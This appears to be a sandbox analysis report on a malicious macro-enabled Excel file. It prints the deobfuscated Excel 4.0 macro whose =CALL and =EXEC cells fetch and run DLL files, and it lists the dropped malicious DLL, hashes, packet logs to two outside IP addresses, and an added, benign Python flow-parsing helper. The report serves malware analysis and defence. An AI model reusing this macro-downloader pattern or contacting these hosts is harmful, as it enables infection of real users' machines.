                                                                                                                                                                      SHA-512:130F0D52D75CE5DB0F67EB64C020EF5F649F6B557F1108D9E0DD362DFB44DB3ED4903C2EC6AECC5F0C38479A34DB5072F61C824AA5793D5506102C6CB804DBB4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: L..................F.... .....8.8...N..-.....-...}...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S........................a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..R.......Y..............>.......m.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .DOCUME~1.XLS..d......>Q.u.R......f.........................d.o.c.u.m.e.n.t.s.-.1.8.1.9.5.5.7.1.1.7...x.l.s.m.......`...............-......._...........>.S......C:\Users\user\Desktop\documents-1819557117.xlsm..0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.s.-.1.8.1.9.5.5.7.1.1.7...x.l.s.m.........:..,.LB.)...Aw...`.......X.......305090...........!a..%.H.VZAj....Yt.+........W...!a..%.H.VZAj....Yt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):115
                                                                                                                                                                      Entropy (8bit):4.66882021623009
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:oyBVomxWKS9LRng9CZELRng9CmxWKS9LRng9Cv:dj49LJQgELJQC9LJQs
                                                                                                                                                                      MD5:359F4F243B208E2F7BEC4696161C1C56
                                                                                                                                                                      SHA1:2EC141564445F34EA03BB20E2F8237AEB9D50C00
                                                                                                                                                                      SHA-256:7FEFA1E5026005C1DBE4548936836F0817E4EEEC59595287FBA1CE9208CE2632
                                                                                                                                                                      SHA-512:4B54C65A070E885723625AE74B2C8A69FE84783FFE9F33748BDF284DE7D0547462C951228CEFBB1DE35B21BF06C982FCE1120C486DA6ABBA1F98F8B8150E70F8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: Desktop.LNK=0..[misc]..documents-1819557117.LNK=0..documents-1819557117.LNK=0..[misc]..documents-1819557117.LNK=0..
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):22
                                                                                                                                                                      Entropy (8bit):2.9808259362290785
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                      MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                      SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                      SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                      SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                      C:\Users\user\Desktop\C6A10000
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):97555
                                                                                                                                                                      Entropy (8bit):7.878354858676539
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:Sun98Sgi2stxzMRzm+62hawSEnsBjFC6QomaIRUxPLe96bGgfn5mw:Sun98SF2stxzMRzm+6Mtn4BC6Qdkx6Mf
                                                                                                                                                                      MD5:E4735BE32837B3EFD70C66BB5547CA81
                                                                                                                                                                      SHA1:90748B338652039E32B449C0E35FA43A90A5D0C7
                                                                                                                                                                      SHA-256:5338F8519CE6018CD4EB19F7E2144BEAC3DDF7CE8D440596BEF9B540A1AF26AE
                                                                                                                                                                      SHA-512:ACEBCDC169CF8040B8E6C6184191DFC076F33A90CD29942667D1C7B69F413E26FA51B9AAF033968BD3EEC2BFA79C0777AE7B3A3EF164BDD5538FF73ACB697E33
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .UKO.0..#...|]%..Vh....Y$......_..h.=c7..J.......1.$......"j.Zv.X.Nz.]..wW.9.0.....Z..d...'.e....e}J.7.({........G+....!..~6.......)s.../..I.....L.c..{Y.e"...Hd.?8.N.........D.`. ....&DM...R....u.4.........9............@!.|...G..ZAu#b........}.O..7.Ir..kXH0MI..BF.........nQ*H..t....d{.r%.x...{0B.7{.Y.Q/,..}........N.../...]hv.ii..8.....^DP...G...^s..x...pq|...6]..7...y.....G]F.. &..a.i...i...n....A...k........PK..........!.\lC............[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      C:\Users\user\Desktop\~$documents-1819557117.xlsm
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                                      MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                                      SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                                      SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                                      SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                      C:\Users\user\ghnrope2.dll
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):185404
                                                                                                                                                                      Entropy (8bit):6.206741223040736
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo
                                                                                                                                                                      MD5:7D7BDC559AE699579A700645D0FD5F03
                                                                                                                                                                      SHA1:C4C0CA6B2B7779D870B0B69E5D7001453BABBFF0
                                                                                                                                                                      SHA-256:0A0B3D91698A46D409791D4DD866E56DDD70F91A3F1D4557A0CB2899BDA1E524
                                                                                                                                                                      SHA-512:3A815F4CEE13B0D491E6C527D30DB0FB9E77FB489F606539E8026A3C2797A3A52672378B9B0788C5DFD5953ECB11D1BA5F2AE30F493CDBBB42A49E42E4278016
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                      Joe Sandbox View:
• Filename: documents-1819557117.xlsm, Detection: malicious
                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................Rich..........PE..d..._.p`.........." ......................................................................`.....................................................<...................................0...................................................0............................text............................... ..`.rdata..@...........................@..@.data...............................@....pdata...............~..............@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                                                      Entropy (8bit):7.878779807636458
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                                      • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                                      File name:documents-1819557117.xlsm
                                                                                                                                                                      File size:98253
                                                                                                                                                                      MD5:4dd14d22cd0272ae24128bb1356a842c
                                                                                                                                                                      SHA1:abf7d941f4ebf949816c5576060bfce76f836ae9
                                                                                                                                                                      SHA256:f06910daadc7c66c8e9064d0719ed6727d69c1f04ab13566cadbb6e7a9f52a7e
                                                                                                                                                                      SHA512:ccba2a4ea072bf9363c4d22d8668d0df99b8101fbcf9fd3f881267fa78cfde954aa749fa92907cf5ed0f700b29e538e2c258117e67b3374525c5a751ab036784
                                                                                                                                                                      SSDEEP:1536:nSRSI4oWt6JJwQz8jbzPmHnsBjFC6QomaIRUxPLe96bGAfe2hawpx:nSE7oWt6Xz8jbzP0n4BC6Qdkx60WMD
                                                                                                                                                                      File Content Preview:PK..........!.\lC.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:74ecd0e2f696908c

                                                                                                                                                                      Static OLE Info

General

Document Type: OpenXML
Number of OLE Files: 1

OLE File "documents-1819557117.xlsm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

The hidden macro sheet is mostly padding. The block =RAND()=FACT(59)=SUMXMY2(452354,45245) is repeated many times between every working cell, and the =EXEC cells are padded the same way with =SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275). The dump also carries CSV-style doubled quotes ("" standing for a literal "), shown unescaped here. With the padding stripped, the cells that do something are, in sheet order:

=CALL('Doc1'!AM19&"n",'Doc1'!AM20&"A",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM23,'Doc1'!AO15&".dll",0,0)
=CALL('Doc1'!AM19&"n",'Doc1'!AM20&"A",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM24,'Doc1'!AO15&"1"&".dll",0,0)
=CALL('Doc1'!AM19&"n",'Doc1'!AM20&"A",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM25,'Doc1'!AO15&"2"&".dll",0,0)
=CALL('Doc1'!AM19&"n",'Doc1'!AM20&"A",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM26,'Doc1'!AO15&"3"&".dll",0,0)
=CALL('Doc1'!AM19&"n",'Doc1'!AM20&"A",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM27,'Doc1'!AO15&"4"&".dll",0,0)
='Doc1'!AO20()
="..\ghnrope"        (a string cell in a separate region of the same dump; the only path literal visible)
=EXEC(AM34&AO15)
=EXEC(AM34&BP106)
=EXEC(AM34&BP107)
=EXEC(AM34&BP108)
=EXEC(AM34&BP109)
=HALT()

How to read it: =CALL(module, procedure, type_text, arg1, ...) is the Excel 4.0 primitive for invoking an exported function from a DLL. Here the module and procedure names are assembled at run time from a cell value plus a one-character suffix ("n" and "A"), so neither string is present whole in the file. The same split-string trick builds the five target file names from 'Doc1'!AO15 plus ".dll", "1.dll" ... "4.dll", one per call; 'Doc1'!AM30 sits in the type_text position, and 'Doc2'!AR84 plus one of 'Doc1'!AM23..AM27 supply the remaining arguments. ='Doc1'!AO20() transfers control to another macro cell, after which the five =EXEC cells each run a command built from AM34 followed by a second cell (AO15 for the first, BP106..BP109 for the rest), and =HALT() ends the macro. The values of AM19, AM20, AM23..AM27, AM30, AM34, AR84 and BP106..BP109 are not reproduced in this dump, so the actual module, export and command line have to be read from the sheet itself. What the dump does pin down is the shape: five calls into the same export, each naming a distinct ".dll" path under the same base, then five =EXEC commands ending in a path cell. The one literal that survives, ..\ghnrope, is a relative path with no extension, which is why the executed file and the ".dll" names built by =CALL can differ only in their suffix.

Network Behavior

Network Port Distribution
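
Added example, not from the report: a Python helper that rebuilds client/server flows from rows of the TCP Packets table below and rolls them up per server port, which is the information a port-distribution view summarizes. The sample rows are transcribed from the table and laid out as Timestamp, Source Port, Dest Port, Source IP, Dest IP with whitespace between columns; treating 192.168.2.x as the sandbox guest network is an assumption drawn from the source addresses, and timestamps are kept as integer nanoseconds so durations are exact.

```python
"""Flow reconstruction from the TCP Packets table of a sandbox report.
Added example, not part of the report. LOCAL_NET and the column layout of
SAMPLE_ROWS are assumptions; the rows themselves are transcribed from the table."""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

LOCAL_NET = "192.168.2."   # assumed guest network: a source here means client -> server
EPOCH = datetime(1970, 1, 1)

# Constructed from table rows: timestamp, source port, dest port, source IP, dest IP.
SAMPLE_ROWS = """\
Apr 9, 2021 16:32:49.619826078 CEST  49705  80     192.168.2.5    8.211.4.209
Apr 9, 2021 16:32:49.637772083 CEST  80     49705  8.211.4.209    192.168.2.5
Apr 9, 2021 16:32:50.044636965 CEST  80     49705  8.211.4.209    192.168.2.5
Apr 9, 2021 16:32:50.049861908 CEST  49707  80     192.168.2.5    8.211.4.209
Apr 9, 2021 16:32:50.476417065 CEST  80     49707  8.211.4.209    192.168.2.5
Apr 9, 2021 16:32:50.630471945 CEST  49708  443    192.168.2.5    162.251.80.27
Apr 9, 2021 16:32:50.777673960 CEST  443    49708  162.251.80.27  192.168.2.5
Apr 9, 2021 16:32:51.567527056 CEST  443    49708  162.251.80.27  192.168.2.5
"""

_ROW = re.compile(
    r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d{1,9}) \w+\s+(\d+)\s+(\d+)\s+(\S+)\s+(\S+)$"
)


def parse_ns(base: str, frac: str) -> int:
    """Nanoseconds since the epoch as an int, so packet deltas are exact.
    The zone label is ignored: all rows of one report share it."""
    whole = int((datetime.strptime(base, "%b %d, %Y %H:%M:%S") - EPOCH).total_seconds())
    return whole * 10**9 + int(frac.ljust(9, "0"))


@dataclass
class Flow:
    client: tuple[str, int]
    server: tuple[str, int]
    first_ns: int
    last_ns: int
    out_pkts: int = 0   # client -> server
    in_pkts: int = 0    # server -> client

    @property
    def duration_s(self) -> float:
        return (self.last_ns - self.first_ns) / 1e9


def build_flows(text: str) -> dict[tuple, Flow]:
    """Group packets into client/server flows regardless of packet direction."""
    flows: dict[tuple, Flow] = {}
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if not m:
            continue   # header or unparseable row
        ts = parse_ns(m[1], m[2])
        sport, dport, sip, dip = int(m[3]), int(m[4]), m[5], m[6]
        outbound = sip.startswith(LOCAL_NET)
        key = ((sip, sport), (dip, dport)) if outbound else ((dip, dport), (sip, sport))
        f = flows.setdefault(key, Flow(key[0], key[1], ts, ts))
        f.first_ns, f.last_ns = min(f.first_ns, ts), max(f.last_ns, ts)
        if outbound:
            f.out_pkts += 1
        else:
            f.in_pkts += 1
    return flows


def port_distribution(flows: dict[tuple, Flow]) -> dict[tuple[str, int], int]:
    """Connections per (server IP, server port): the port-distribution view."""
    dist: dict[tuple[str, int], int] = defaultdict(int)
    for f in flows.values():
        dist[f.server] += 1
    return dict(dist)


if __name__ == "__main__":
    flows = build_flows(SAMPLE_ROWS)
    for f in flows.values():
        print(f"{f.client[0]}:{f.client[1]} -> {f.server[0]}:{f.server[1]} "
              f"out={f.out_pkts} in={f.in_pkts} {f.duration_s:.3f}s")
    print(port_distribution(flows))
```

On the sample rows this yields two short connections from ephemeral ports 49705 and 49707 to 8.211.4.209:80 and one longer session from 49708 to 162.251.80.27:443, which is the pivot an analyst wants before opening the HTTP and TLS details further down.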

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 9, 2021 16:32:49.619826078 CEST | 49705 | 80 | 192.168.2.5 | 8.211.4.209
Apr 9, 2021 16:32:49.637772083 CEST | 80 | 49705 | 8.211.4.209 | 192.168.2.5
Apr 9, 2021 16:32:49.637875080 CEST | 49705 | 80 | 192.168.2.5 | 8.211.4.209
Apr 9, 2021 16:32:49.638366938 CEST | 49705 | 80 | 192.168.2.5 | 8.211.4.209
Apr 9, 2021 16:32:49.698909998 CEST | 80 | 49705 | 8.211.4.209 | 192.168.2.5
Apr 9, 2021 16:32:50.025616884 CEST | 80 | 49705 | 8.211.4.209 | 192.168.2.5
Apr 9, 2021 16:32:50.025829077 CEST | 49705 | 80 | 192.168.2.5 | 8.211.4.209
Apr 9, 2021 16:32:50.025876999 CEST | 80 | 49705 | 8.211.4.209 | 192.168.2.5
Apr 9, 2021 16:32:50.025898933 CEST | 49705 | 80 | 192.168.2.5 | 8.211.4.209
Apr 9, 2021 16:32:50.025938034 CEST | 49705 | 80 | 192.168.2.5 | 8.211.4.209
Apr 9, 2021 16:32:50.044636965 CEST | 80 | 49705 | 8.211.4.209 | 192.168.2.5
Apr 9, 2021 16:32:50.049861908 CEST | 49707 | 80 | 192.168.2.5 | 8.211.4.209
Apr 9, 2021 16:32:50.067761898 CEST | 80 | 49707 | 8.211.4.209 | 192.168.2.5
Apr 9, 2021 16:32:50.067909956 CEST | 49707 | 80 | 192.168.2.5 | 8.211.4.209
Apr 9, 2021 16:32:50.068398952 CEST | 49707 | 80 | 192.168.2.5 | 8.211.4.209
Apr 9, 2021 16:32:50.130856037 CEST | 80 | 49707 | 8.211.4.209 | 192.168.2.5
Apr 9, 2021 16:32:50.458079100 CEST | 80 | 49707 | 8.211.4.209 | 192.168.2.5
Apr 9, 2021 16:32:50.458324909 CEST | 49707 | 80 | 192.168.2.5 | 8.211.4.209
Apr 9, 2021 16:32:50.458386898 CEST | 49707 | 80 | 192.168.2.5 | 8.211.4.209
Apr 9, 2021 16:32:50.476417065 CEST | 80 | 49707 | 8.211.4.209 | 192.168.2.5
Apr 9, 2021 16:32:50.630471945 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:50.777673960 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:50.778187990 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:50.779658079 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:50.927629948 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:50.934895039 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:50.934953928 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:50.934982061 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:50.935080051 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:50.935117006 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:50.947853088 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.096577883 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.096704960 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.097331047 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.270441055 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.270473003 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.270489931 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.270507097 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.270545006 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.270581007 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.270590067 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.270593882 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.270633936 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.270648003 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.271066904 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.271090984 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.271104097 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.271140099 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.271168947 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.417557001 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.417587996 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.417694092 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.417711973 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.417733908 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.417783976 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.418159008 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418237925 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.418329000 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418351889 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418370962 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418386936 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418421984 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.418453932 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.418607950 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418680906 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.418698072 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418715954 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418746948 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418750048 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.418790102 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.418802977 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.418826103 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418855906 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418881893 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.418916941 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.418936014 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418953896 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418968916 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418983936 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.418989897 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.419001102 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.419024944 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.419064999 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.566822052 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.566852093 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.566864014 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.566876888 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.567084074 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.567210913 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.567241907 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.567276955 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.567287922 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.567303896 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.567322969 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.567349911 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.567365885 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.567398071 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.567420006 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.567433119 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.567475080 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.567488909 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27
Apr 9, 2021 16:32:51.567492008 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.567508936 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
Apr 9, 2021 16:32:51.567527056 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.567547083 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.567550898 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.567565918 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.567580938 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.567580938 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.567648888 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.567724943 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.567780972 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.567823887 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.567852974 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.567868948 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.567893028 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.567907095 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.567908049 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.567936897 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.567938089 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.567970991 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.567994118 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.568006039 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.568022966 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.568051100 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.568068981 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.568082094 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.568099976 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.568103075 CEST49708443192.168.2.5162.251.80.27
